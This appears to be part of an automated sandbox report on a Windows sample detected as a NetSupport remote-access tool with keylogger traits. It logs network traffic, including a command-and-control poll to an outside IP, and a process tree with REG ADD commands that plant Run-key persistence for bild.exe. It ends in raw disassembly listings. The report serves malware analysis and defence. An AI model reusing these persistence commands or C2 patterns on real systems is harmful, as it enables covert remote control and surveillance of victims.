                                                                                    Dec 24, 2024 17:37:05.673389912 CET8049731104.26.1.231192.168.2.4
                                                                                    Dec 24, 2024 17:37:05.673511982 CET4973180192.168.2.4104.26.1.231
                                                                                    Dec 24, 2024 17:37:05.679013014 CET4973180192.168.2.4104.26.1.231
                                                                                    Dec 24, 2024 17:37:05.679086924 CET4973180192.168.2.4104.26.1.231
                                                                                    Dec 24, 2024 17:37:05.680978060 CET4973280192.168.2.4104.26.1.231
                                                                                    Dec 24, 2024 17:37:05.800534010 CET8049732104.26.1.231192.168.2.4
                                                                                    Dec 24, 2024 17:37:05.800899982 CET4973280192.168.2.4104.26.1.231
                                                                                    Dec 24, 2024 17:37:05.801115036 CET4973280192.168.2.4104.26.1.231
                                                                                    Dec 24, 2024 17:37:05.920635939 CET8049732104.26.1.231192.168.2.4
                                                                                    Dec 24, 2024 17:37:07.094100952 CET8049732104.26.1.231192.168.2.4
                                                                                    Dec 24, 2024 17:37:07.094183922 CET4973280192.168.2.4104.26.1.231
                                                                                    Dec 24, 2024 17:37:07.094788074 CET4973280192.168.2.4104.26.1.231
                                                                                    Dec 24, 2024 17:37:07.094970942 CET4973280192.168.2.4104.26.1.231
                                                                                    Dec 24, 2024 17:37:07.095992088 CET4973380192.168.2.4104.26.1.231
                                                                                    Dec 24, 2024 17:37:07.215528011 CET8049733104.26.1.231192.168.2.4
                                                                                    Dec 24, 2024 17:37:07.215639114 CET4973380192.168.2.4104.26.1.231
                                                                                    Dec 24, 2024 17:37:07.215909958 CET4973380192.168.2.4104.26.1.231
                                                                                    Dec 24, 2024 17:37:07.335572004 CET8049733104.26.1.231192.168.2.4
                                                                                    Dec 24, 2024 17:37:08.511013031 CET8049733104.26.1.231192.168.2.4
                                                                                    Dec 24, 2024 17:37:08.511087894 CET4973380192.168.2.4104.26.1.231
                                                                                    Dec 24, 2024 17:37:08.511360884 CET4973380192.168.2.4104.26.1.231
                                                                                    Dec 24, 2024 17:37:08.511388063 CET4973380192.168.2.4104.26.1.231

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 24, 2024 17:37:04.101300955 CET6356753192.168.2.41.1.1.1
                                                                                    Dec 24, 2024 17:37:04.240010023 CET53635671.1.1.1192.168.2.4

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Dec 24, 2024 17:37:04.101300955 CET192.168.2.41.1.1.10x33abStandard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Dec 24, 2024 17:37:04.240010023 CET1.1.1.1192.168.2.40x33abNo error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                    Dec 24, 2024 17:37:04.240010023 CET1.1.1.1192.168.2.40x33abNo error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                                    Dec 24, 2024 17:37:04.240010023 CET1.1.1.1192.168.2.40x33abNo error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • 45.76.253.210connection: keep-alivecmd=pollinfo=1ack=1
                                                                                    • geo.netsupportsoftware.com

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.44973045.76.253.2104437692C:\Users\Public\Netstat\bild.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 24, 2024 17:37:03.493812084 CET218OUTPOST http://45.76.253.210/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 45.76.253.210Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                    Data Raw:
                                                                                    Data Ascii:


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.449731104.26.1.231807692C:\Users\Public\Netstat\bild.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 24, 2024 17:37:04.371897936 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                    Host: geo.netsupportsoftware.com
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    Dec 24, 2024 17:37:05.673389912 CET1123INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 24 Dec 2024 16:37:05 GMT
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    CF-Ray: 8f72039419fd425f-EWR
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    cf-apo-via: origin,host
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lW7SVSTeGp6OMPZWlwr0EkdKqCkxO1QY2Xx3tzIwjQw9wj7tLvCi2nECvSnMfUIfdQit%2BIjKqFjaT%2BrObcB9Ya5UFQLQZ5UrOriDWvmNuxghySnFhBKpzWUwyWyGKBbDC7Go%2B1Qt6tiUe4aX"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1599&rtt_var=799&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.449732104.26.1.231807692C:\Users\Public\Netstat\bild.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 24, 2024 17:37:05.801115036 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                    Host: geo.netsupportsoftware.com
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    Dec 24, 2024 17:37:07.094100952 CET1116INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 24 Dec 2024 16:37:06 GMT
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    CF-Ray: 8f72039d1ee742a0-EWR
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    cf-apo-via: origin,host
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IPdTQEZmPl0lBKR8KjJx9PbAboAcYEK7D0bbCWAIEhlIB2fELg1PzGJcs9DUzwzswUJFVFDlO6xK%2B1ubSbS%2BNIjFDfBktvslhfF6N0RWnlYC80AqdmHSVPfal9CXdU5wPQqn7KgQ63D2hQAs"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1786&min_rtt=1786&rtt_var=893&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a
                                                                                    Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.449733104.26.1.231807692C:\Users\Public\Netstat\bild.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 24, 2024 17:37:07.215909958 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                    Host: geo.netsupportsoftware.com
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    Dec 24, 2024 17:37:08.511013031 CET1121INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 24 Dec 2024 16:37:08 GMT
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    CF-Ray: 8f7203a5e8bd2363-EWR
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    cf-apo-via: origin,host
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aDN2muabuDV1YmuvJbYCyAYC9CLGNBg8bk%2BbqBXz3O2MIc1VvRFdsqJwbq0YkROI6bTaCOg9HNkgix49mKAnVimMvoH2wsMzl%2FQqSiPrfHtdCuW91y1E0zHliTGDWMPvBl1ijm4wLylWZyjI"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1816&min_rtt=1816&rtt_var=908&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:11:37:00
                                                                                    Start date:24/12/2024
                                                                                    Path:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe"
                                                                                    Imagebase:0xd70000
                                                                                    File size:2'138'135 bytes
                                                                                    MD5 hash:47CFCE938A71540A2039AEBD5ABE0783
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:1
                                                                                    Start time:11:37:01
                                                                                    Start date:24/12/2024
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
                                                                                    Imagebase:0x240000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:2
                                                                                    Start time:11:37:01
                                                                                    Start date:24/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:3
                                                                                    Start time:11:37:01
                                                                                    Start date:24/12/2024
                                                                                    Path:C:\Windows\SysWOW64\reg.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
                                                                                    Imagebase:0xc80000
                                                                                    File size:59'392 bytes
                                                                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:4
                                                                                    Start time:11:37:01
                                                                                    Start date:24/12/2024
                                                                                    Path:C:\Windows\SysWOW64\reg.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
                                                                                    Imagebase:0xc80000
                                                                                    File size:59'392 bytes
                                                                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:5
                                                                                    Start time:11:37:01
                                                                                    Start date:24/12/2024
                                                                                    Path:C:\Users\Public\Netstat\bild.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\Public\Netstat\bild.exe
                                                                                    Imagebase:0x4b0000
                                                                                    File size:105'848 bytes
                                                                                    MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.4161091973.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000000.1712834967.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\bild.exe, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 29%, ReversingLabs
                                                                                    Reputation:moderate
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:6
                                                                                    Start time:11:37:12
                                                                                    Start date:24/12/2024
                                                                                    Path:C:\Users\Public\Netstat\bild.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\Public\Netstat\bild.exe"
                                                                                    Imagebase:0x4b0000
                                                                                    File size:105'848 bytes
                                                                                    MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.1828037361.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000000.1825297800.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.1826623935.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:10
                                                                                    Start time:11:37:20
                                                                                    Start date:24/12/2024
                                                                                    Path:C:\Users\Public\Netstat\bild.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\Public\Netstat\bild.exe"
                                                                                    Imagebase:0x4b0000
                                                                                    File size:105'848 bytes
                                                                                    MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.1909557431.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.1908011994.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000000.1906094191.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:11
                                                                                    Start time:11:37:29
                                                                                    Start date:24/12/2024
                                                                                    Path:C:\Users\Public\Netstat\bild.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\Public\Netstat\bild.exe"
                                                                                    Imagebase:0x4b0000
                                                                                    File size:105'848 bytes
                                                                                    MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.1989203129.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000000.1987565229.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.1988599605.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:10.3%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:10.1%
                                                                                      Total number of Nodes:1451
                                                                                      Total number of Limit Nodes:27
                                                                                      execution_graph 23746 d8aa99 96 API calls 4 library calls 23853 d94bda 52 API calls 2 library calls 21972 d8c0d0 21973 d8c0dd 21972->21973 21980 d7d142 21973->21980 21981 d7d172 21980->21981 21982 d7d191 LoadStringW 21981->21982 21983 d7d17b LoadStringW 21981->21983 21984 d7d1a3 21982->21984 21983->21982 21983->21984 21993 d7c91f 21984->21993 21986 d7d1b1 21987 d73f5b 21986->21987 22003 d73f2e 21987->22003 21990 d8991e PeekMessageW 21991 d89939 GetMessageW TranslateMessage DispatchMessageW 21990->21991 21992 d8995a 21990->21992 21991->21992 21994 d7c929 21993->21994 21997 d7c99d _strlen 21994->21997 22000 d7c9fb _wcschr _wcsrchr 21994->22000 22001 d80905 WideCharToMultiByte 21994->22001 22002 d80905 WideCharToMultiByte 21997->22002 21998 d7c9c8 _strlen 21999 d73f5b _swprintf 51 API calls 21998->21999 21999->22000 22000->21986 22001->21997 22002->21998 22004 d73f45 __vswprintf_c_l 22003->22004 22007 d934dd 22004->22007 22010 d921bb 22007->22010 22011 d921fb 22010->22011 22012 d921e3 22010->22012 22011->22012 22013 d92203 22011->22013 22027 d95e3e 20 API calls __dosmaperr 22012->22027 22029 d92636 22013->22029 22016 d921e8 22028 d95d1d 26 API calls pre_c_initialization 22016->22028 22019 d921f3 22020 d8d783 ___delayLoadHelper2@8 5 API calls 22019->22020 22022 d73f4f SetDlgItemTextW 22020->22022 22022->21990 22023 d9228b 22038 d9283c 51 API calls 3 library calls 22023->22038 22026 d92296 22039 d926b9 20 API calls _free 22026->22039 22027->22016 22028->22019 22030 d92653 22029->22030 22031 d92213 22029->22031 22030->22031 22040 d9631f GetLastError 22030->22040 22037 d92601 20 API calls 2 library calls 22031->22037 22033 d92674 22061 d9646e 38 API calls __fassign 22033->22061 22035 d9268d 22062 d9649b 38 API calls __fassign 22035->22062 22037->22023 22038->22026 22039->22019 22041 d96341 22040->22041 22042 d96335 22040->22042 22064 d95a8d 20 API calls 3 library calls 22041->22064 22063 d978f8 11 API calls 2 library calls 22042->22063 22045 d9633b 22045->22041 22047 d9638a SetLastError 22045->22047 22046 d9634d 22048 d96355 22046->22048 22071 d9794e 11 API calls 2 library calls 22046->22071 22047->22033 22065 d959c2 22048->22065 22051 d9636a 22051->22048 22053 d96371 22051->22053 22052 d9635b 22055 d96396 SetLastError 22052->22055 22072 d96191 20 API calls __dosmaperr 22053->22072 22073 d95a4a 38 API calls _abort 22055->22073 22056 d9637c 22058 d959c2 _free 20 API calls 22056->22058 22060 d96383 22058->22060 22060->22047 22060->22055 22061->22035 22062->22031 22063->22045 22064->22046 22066 d959f6 _free 22065->22066 22067 d959cd RtlFreeHeap 22065->22067 22066->22052 22067->22066 22068 d959e2 22067->22068 22074 d95e3e 20 API calls __dosmaperr 22068->22074 22070 d959e8 GetLastError 22070->22066 22071->22051 22072->22056 22074->22070 23751 d87cd5 GetClientRect 23796 d7ddda FreeLibrary 23819 d94ed4 55 API calls _free 23854 d96fcb 71 API calls _free 23820 d886cb 22 API calls 23821 d97ecd 6 API calls ___delayLoadHelper2@8 23822 d8aa99 101 API calls 4 library calls 23797 d971c0 31 API calls 2 library calls 23856 d863c3 114 API calls 23636 d79bc8 23637 d79bd4 23636->23637 23638 d79bdb 23636->23638 23639 d79be1 GetStdHandle 23638->23639 23641 d79bec 23638->23641 23639->23641 23640 d79c41 WriteFile 23640->23641 23641->23637 23641->23640 23642 d79c11 WriteFile 23641->23642 23643 d79c0c 23641->23643 23645 d79cb4 23641->23645 23647 d76d5a 56 API calls 23641->23647 23642->23641 23642->23643 23643->23641 23643->23642 23648 d76f67 68 API calls 23645->23648 23647->23641 23648->23637 23753 d988fb GetCommandLineA GetCommandLineW 23798 d8d5ff 27 API calls pre_c_initialization 23652 d718fb 126 API calls __EH_prolog 23857 d8c3ea 19 API calls ___delayLoadHelper2@8 23824 d716e3 79 API calls 23861 d8bfe4 75 API calls 23756 d9c0e4 51 API calls 23801 d8899a GdipCloneImage GdipAlloc 23825 d90e9d 48 API calls 22707 